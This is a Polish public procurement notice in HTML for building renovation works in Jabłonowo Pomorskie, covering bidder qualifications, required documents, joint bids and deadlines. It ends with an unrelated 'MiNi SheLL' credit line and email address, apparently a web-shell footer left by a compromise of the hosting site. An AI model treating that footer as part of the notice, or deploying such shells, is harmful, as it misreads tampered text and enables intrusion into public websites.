class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) Warunek dotyczący zdolności technicznej lub zawodowej – Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/>a)	posiada doświadczenie w przedmiocie zamówienia, tj. jeżeli Wykonawca wykaże, że nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej jedną robotę budowlaną o wartości pojedynczej umowy nie mniejszej niż 400 000,00 zł brutto. Przy czym ww. robota musi obejmować co najmniej: <br/>•	przebudowę co najmniej jednego budynku o powierzchni przebudowywanej nie mniejszej niż 180 m2 oraz wykonaniem, w wykazywanej Zamawiającemu przebudowywanej części, budynku instalacji elektrycznej i sanitarnej. <br/>Przez „przebudowę” Zamawiający rozumie: odbudowę lub rozbudowę lub dobudowę lub nadbudowę.<br/>Przez „powierzchnię przebudowywaną”, Zamawiający rozumie odpowiednio powierzchnię: odbudowaną lub rozbudowaną lub dobudowaną lub nadbudowaną.<br/>2) Warunek dot. zdolności technicznej lub zawodowej – Zamawiający uzna warunek za spełniony, jeżeli Wykonawca<br/>wykaże, że będzie dysponował w realizacji zamówienia co najmniej jedną osobą wykonującą zadania kierownika budowy,<br/>która:<br/>- będzie posiadała co najmniej wykształcenie średnie oraz uprawnienia budowlane do kierowania robotami budowlanymi<br/>bez ograniczeń w specjalności konstrukcyjno-budowlanej oraz na dzień składania podmiotowego środka dowodowego co<br/>najmniej 5 lat doświadczenia zawodowego przy budowie lub przebudowie budynków na stanowisku kierownika budowy lub<br/>- która będzie posiadała co najmniej wykształcenie średnie oraz inne ważne uprawnienia budowlane do kierowania robotami<br/>budowlanymi bez ograniczeń w specjalności konstrukcyjnej lub budowlanej, wydane na podstawie wcześniej<br/>obowiązujących przepisów prawa, oraz na dzień składania podmiotowego środka dowodowego co najmniej 5 lat<br/>doświadczenia zawodowego przy budowie lub przebudowie budynków na stanowisku kierownika budowy.<br/>Uprawnienia, o których mowa powyżej obejmują uprawnienia wydane na podstawie ustawy z dnia 7.07.1994 r. Prawo<br/>Budowlane (tekst jedn. Dz. U. z 2021 r. poz. 2351 ze zm.) i Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29.04.2019<br/>r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z<br/>2019 r. poz. 831) lub inne odpowiednie wydane na podstawie wcześniej obowiązujących przepisów prawa lub<br/>odpowiadające im uprawnienia budowlane, które zostały wydane obywatelom państw Europejskiego Obszaru<br/>Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy z dnia 7 lipca<br/>1994 r. Prawo Budowlane (tekst jedn. Dz. U. z 2021 r., poz. 2351 ze zm.) oraz ustawy z dnia 22.12.2015 r. o zasadach<br/>uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tekst jedn. Dz. U. z 2021 r.,<br/>poz. 1646 ze zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Od wykonawcy, którego<br/>oferta zostanie najwyżej oceniona, na wezwanie zamawiającego o którym mowa w art. 274 ust. 1 PZP zamawiający będzie wymagał:<br/>1) oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP, w zakresie<br/>podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w: art. 108 ust. 1 pkt 1 PZP, art. 108 ust. 1<br/>pkt 2 PZP, art. 108 ust. 1 pkt 3 PZP, art. 108 ust. 1 pkt 4 PZP, art. 108 ust. 1 pkt 6 PZP, art. 109 ust. 1 pkt 8 PZP, 109 ust. 1 pkt 10<br/>PZP;<br/>2) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;<br/>3) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o:<br/>• braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i<br/>konsumentów (tekst jedn. Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę<br/>albo<br/>• przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów<br/>(tekst jedn. Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Od<br/>wykonawcy, którego oferta zostanie najwyżej oceniona, na wezwanie zamawiającego o którym mowa w art. 274 ust. 1 PZP, w celu<br/>wykazania minimalnych zdolności, będzie wymagane przedłożenie podmiotowego środka dowodowego w postaci wykazu robót<br/>budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym<br/>okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały<br/>wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie<br/>dokumenty.<br/>UWAGA - Treść wykazu, o którym mowa powyżej, musi potwierdzać spełnianie przez Wykonawcę warunku, o którym mowa w<br/>rozdziale XII ust. 2 pkt 4 lit. a) SWZ. Wzór wykazu stanowi załącznik nr 8 do SWZ;<br/>Od wykonawcy, którego oferta zostanie najwyżej oceniona, na wezwanie zamawiającego o którym mowa w art. 274 ust. 1 PZP, w<br/>celu wykazania minimalnych zdolności, będzie wymagane przedłożenie podmiotowego środka dowodowego w postaci wykazu osób,<br/>skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór<br/>wykazu zawarto w załączniku nr 9 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Przedmiotowe środki dowodowe (jeśli dotyczy) potwierdzające, że proponowane przez wykonawcę: rozwiązania, elementy,<br/>materiały, urządzenia są równoważne dla robót, materiałów, systemów i urządzeń, wskazanych w SWZ i w załączonej<br/>dokumentacji, spełniające minimalne wymagania (parametry techniczne) określone przez zamawiającego w SWZ.<br/>Przedmiotowe środki dowodowe należy przedłożyć w formie dokumentów wskazanych w rozdziale III ust. 15-19 SWZ.<br/>Przedmiotowe środki dowodowe muszą potwierdzać spełnianie wszystkich określonych przez zamawiającego wymagań, w<br/>stopniu nie niższym (gorszym) niż wskazane w SWZ.<br/>W przypadku rozwiązań równoważnych zaproponowanych przez wykonawcę w ofercie, powyższe będzie miało<br/>zastosowanie odpowiednio do przedstawionych rozwiązań równoważnych.<br/>Jeżeli wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą<br/>niekompletne zamawiający, na podstawie art. 107 ust. 2 PZP, wezwie do ich złożenia lub uzupełnienia w wyznaczonym<br/>przez siebie terminie, o ile złożona oferta nie będzie podlegała odrzuceniu albo nie zajdą przesłanki unieważnienia<br/>postępowania. Powyższe uzupełnienie nie będzie miało zastosowania w przypadku określonym w art. 107 ust. 3 PZP. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Przedmiotowe środki dowodowe (jeśli dotyczy) potwierdzające, że proponowane przez wykonawcę: rozwiązania,<br/>elementy, materiały, urządzenia są równoważne dla robót, materiałów, systemów i urządzeń, wskazanych w SWZ i w<br/>załączonej dokumentacji, spełniające minimalne wymagania (parametry techniczne) określone przez zamawiającego w<br/>SWZ. Przedmiotowe środki dowodowe należy przedłożyć w formie dokumentów wskazanych w rozdziale III ust. 15-19 SWZ. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty składające się na ofertę oraz dokumenty wymagane wraz z ofertą:<br/>1) Formularz ofertowy. Wzór formularza zawarto w załączniku nr 2 do SWZ;<br/>2) Oświadczenia o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, składane na podstawie art.<br/>125 ust. 1 PZP. Wzory oświadczeń zawarto, odpowiednio, w załączniku nr 3 i załączniku nr 4 do SWZ;<br/>3) Odpis lub informację z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej<br/>lub innego właściwego rejestru, w celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego<br/>reprezentowania. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w zdaniu poprzedzającym,<br/>jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał daneumożliwiające dostęp do tych dokumentów (np. pełną nazwę, NIP, REGON, itp.).<br/>Jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z KRS lub CEIDG lub<br/>innego właściwego rejestru, zamawiający może żądać od wykonawcy pełnomocnictwa lub innego dokumentu<br/>potwierdzającego umocowanie do reprezentowania wykonawcy lub odpowiednio: do osoby działającej w imieniu<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego oraz osoby działającej w imieniu podmiotu<br/>udostępniającego zasoby na zasadach określonych w art. 118 PZP lub podwykonawcy niebędącego podmiotem<br/>udostępniającym zasoby na takich zasadach;<br/>4) Przedmiotowe środki dowodowe (jeśli dotyczy) potwierdzające, że proponowane przez wykonawcę: rozwiązania,<br/>elementy, materiały, urządzenia są równoważne dla robót, materiałów, systemów i urządzeń, wskazanych w SWZ i w<br/>załączonej dokumentacji, spełniające minimalne wymagania (parametry techniczne) określone przez zamawiającego w<br/>SWZ. Przedmiotowe środki dowodowe należy przedłożyć w formie dokumentów wskazanych w rozdziale III ust. 15-19 SWZ.<br/>Przedmiotowe środki dowodowe muszą potwierdzać spełnianie wszystkich określonych przez zamawiającego wymagań, w<br/>stopniu nie niższym (gorszym) niż wskazane w SWZ.<br/>W przypadku rozwiązań równoważnych zaproponowanych przez wykonawcę w ofercie, powyższe będzie miało<br/>zastosowanie odpowiednio do przedstawionych rozwiązań równoważnych.<br/>Jeżeli wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą<br/>niekompletne zamawiający, na podstawie art. 107 ust. 2 PZP, wezwie do ich złożenia lub uzupełnienia w wyznaczonym<br/>przez siebie terminie, o ile złożona oferta nie będzie podlegała odrzuceniu albo nie zajdą przesłanki unieważnienia<br/>postępowania. Powyższe uzupełnienie nie będzie miało zastosowania w przypadku określonym w art. 107 ust. 3 PZP;<br/>5) Pełnomocnictwo upoważniające do złożenia oferty (jeśli dotyczy);<br/>6) Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia - o ile ofertę składają wykonawcy wspólnie ubiegający się o udzielenie zamówienia np. konsorcjum,<br/>spółki cywilne;<br/>7) Zobowiązanie podmiotu udostępniającego zasoby, na których zdolności techniczne lub zawodowe lub sytuację finansową<br/>lub ekonomiczną wykonawca się powołuje w celu potwierdzenia spełniania warunków udziału w postępowaniu (jeśli<br/>dotyczy). Wzór zobowiązania zawarto w załączniku nr 5 do SWZ;<br/>8) Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, o którym mowa w art. 117<br/>ust. 4 PZP (jeśli dotyczy). Wzór oświadczenia zawarto w załączniku nr 6 do SWZ;<br/>9) Informacje dot. tajemnicy przedsiębiorstwa wraz z uzasadnieniem spełniania przesłanek określonych w art. 11 ust. 2<br/>ustawy o zwalczaniu nieuczciwej konkurencji (jeśli dotyczy);<br/>10) Oświadczenie o niepodleganiu wykluczeniu na podstawie art. 7 ust. 1 ustawy z dnia 13.04.2022 r. o szczególnych<br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa<br/>narodowego. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Sposób spełniania przez wykonawców wspólnie ubiegających się o udzielenie zamówienia warunków udziału w<br/>postępowaniu:<br/>1) warunek dotyczący zdolności do występowania w obrocie gospodarczym, o którym mowa w art. 112 ust. 2 pkt 1 PZP –<br/>nie dotyczy,<br/>2) warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w<br/>art. 112 ust. 2 pkt 2 PZP – nie dotyczy,<br/>3) warunek dotyczący sytuacji ekonomicznej lub finansowej, o którym mowa w art. 112 ust. 2 pkt 3 PZP – nie dotyczy,<br/>4) warunek dotyczący zdolności technicznej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 4 PZP, tj. warunek<br/>określony w rozdziale XII ust. 2 pkt 4 lit. a) SWZ (warunek dotyczący doświadczenia) musi spełnić samodzielnie co najmniej<br/>jeden z wykonawców,<br/>5) warunek dotyczący zdolności technicznej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 4 PZP, tj. warunek<br/>określony w rozdziale XII ust. 2 pkt 4 lit. b) SWZ (warunek dotyczący wykształcenia, uprawnień i doświadczenia osób<br/>skierowanych do wykonywania zadań kierownika budowy) musi spełnić samodzielnie co najmniej jeden z wykonawców.<br/>2. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty<br/>budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>3. W przypadku, o którym mowa w art. 117 ust. 3 PZP, wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni<br/>wykonawcy. Wzór oświadczenia zawarto w załączniku nr 6 do SWZ.<br/>4. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w art. 125 ust. 1<br/>PZP, składa każdy z wykonawców oddzielnie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>Ogłoszenie nr 2022/BZP 00466181 z dnia 2022-11-29<br/>2022-11-29 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane<br/>postępowaniu. Wzór oświadczenia zawarto w załączniku nr 3 do SWZ.<br/>5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego, składając stosowne pełnomocnictwo. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy, określone zostały w załączniku nr 7 do SWZ.<br/>Zmiany postanowień umowy zawarto w § 15 załącznika nr 7 do SWZ.<br/>Wszelkie zmiany niniejszej umowy wymagają dla swej ważności formy pisemnej pod rygorem nieważności, w formie aneksu<br/>zaakceptowanego przez obie Strony, i będą dopuszczalne w granicach unormowania przepisów ustawy z dnia 11.09.2019 r.<br/>Prawo zamówień publicznych, w szczególności art. 454 ust. 1 i 455 (...) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-01-16 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/710809</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-01-16 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-02-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: nie podlegają wykluczeniu na podstawie: art. 7 ust. 1<br/>ustawy z dnia 13.04.2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz<br/>służących ochronie bezpieczeństwa narodowego.<br/>Na potwierdzenie braku podstaw wykluczenia każdy z wykonawców oraz odpowiednio wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia i wszystkie podmioty udostępniające wykonawcy zasoby, składa/-ją w ofercie oświadczenie, o<br/>którym mowa w art. 125 ust. 1 PZP. Wzory oświadczeń zawarto odpowiednio w załączniku nr 3 i 4 do SWZ.<br/>2) Zamawiający nie wymaga odbycia wizji lokalnej ani sprawdzenia przez wykonawcę dokumentów niezbędnych do<br/>realizacji zamówienia, o których mowa w art. 131 ust. 2 PZP. Jednakże z uwagi na charakter zamówienia Zamawiający<br/>zaleca, aby Wykonawcy dokonali wizji lokalnej miejsca realizacji przedmiotu zamówienia w celu dokonania oceny<br/>dokumentów i informacji przekazywanych w ramach niniejszego postępowania. Dokonanie wizji lokalnej możliwe jest w<br/>dniach roboczych Zamawiającego, tj.: od poniedziałku do piątku w godzinach pracy Urzędu Miasta i Gminy Jabłonowo<br/>Pomorskie, po uprzednim ustaleniu terminu z przedstawicielem Zamawiającego pisząc na adres e-mail:<br/>zamowienia.publiczne@jablonowopomorskie.pl .

Creat By MiNi SheLL
Email: jattceo@gmail.com